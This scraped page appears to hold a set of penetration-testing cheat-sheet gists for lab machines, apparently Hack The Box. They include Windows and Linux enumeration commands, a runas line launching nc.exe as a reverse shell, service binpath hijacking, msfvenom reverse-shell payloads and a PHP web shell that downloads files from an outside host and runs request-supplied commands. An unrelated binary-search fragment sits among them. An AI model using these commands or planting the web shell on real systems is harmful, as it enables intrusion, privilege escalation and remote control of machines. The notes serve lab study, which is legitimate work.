This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// What system are we connected to? | |
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" | |
// Get the hostname and username (if available) | |
hostname | |
echo %username% | |
// Get users | |
net users | |
net user [username] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sometimes if the user has saved the credention in cmdkey, we can use runas to use the saved credential to run command as them. | |
- list saved cmd keys: `cmdkey /list` | |
- runas administrator under ACCESS domain: `runas /user:ACCESS\administrator /savecred "C:\xxxxx\nc.exe -nv xxxxx 443 -e C:\Windows\System32\cmd.exe"` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- accesschk.exe /accepteula -uwcqv "Authenticated Users" | |
- sc qc <service> | |
- sc config <service> binpath= "<new bin path>" | |
- sc config <service> obj= ".\LocalSystem" password= "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- snmpwalk -c public -v1 <target> | |
- snmp-check -w -t 30 <target> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msfvenom -p cmd/unix/reverse_python LHOST=10.11.0.57 LPORT=80 SHELL=/bin/bash -v payload -a cmd --platform Unix | |
msfvenom -p python/shell_reverse_tcp LHOST=10.10.12.12 LPORT=4444 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sometings the DNS settings will affect the website page because of the server-side code. | |
vim /etc/hosts and add a line like "<ip> domain", e.g. "10.10.10.120 chaos.htb" | |
dig axfr @10.10.10.xx xxx.htb | |
dnsrecon -n <dns server ip> -r <ip range> --db xxx.db | |
e.g. dnsrecon -n 10.10.10.83 -r 10.0.0.0/8 --db olympus.db |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
have a www-data shell and has credential for user xxx, but user xxx uses rbash => su -l xxxx |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
while l < r: | |
mid = (l + r) // 2 | |
if vals[mid] < target: | |
l = mid + 1 | |
else: | |
r = mid | |
return r | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://github.com/rasta-mouse/Watson | |
https://github.com/rasta-mouse/Sherlock | |
https://github.com/GDSSecurity/Windows-Exploit-Suggester.git | |
https://github.com/EmpireProject/Empire | |
note, remember to add the function you want to use at the bottom of the sherlock.ps1 to use that function. e.g. "Find-AllVulns". | |
No "()". Similar to PowerUp.ps1 (enum all low-handing fruit) in Empire, add "Invoke-AllChecks". | |
For the "windows-exploit-suggester.py": | |
python windows-exploit-suggester.py --update |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(isset($_REQUEST['fupload'])) { | |
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.19/" . $_REQUEST['fupload'])); | |
}; | |
if(isset($_REQUEST['fexec'])) { | |
echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>"; | |
}; | |
?> |
OlderNewer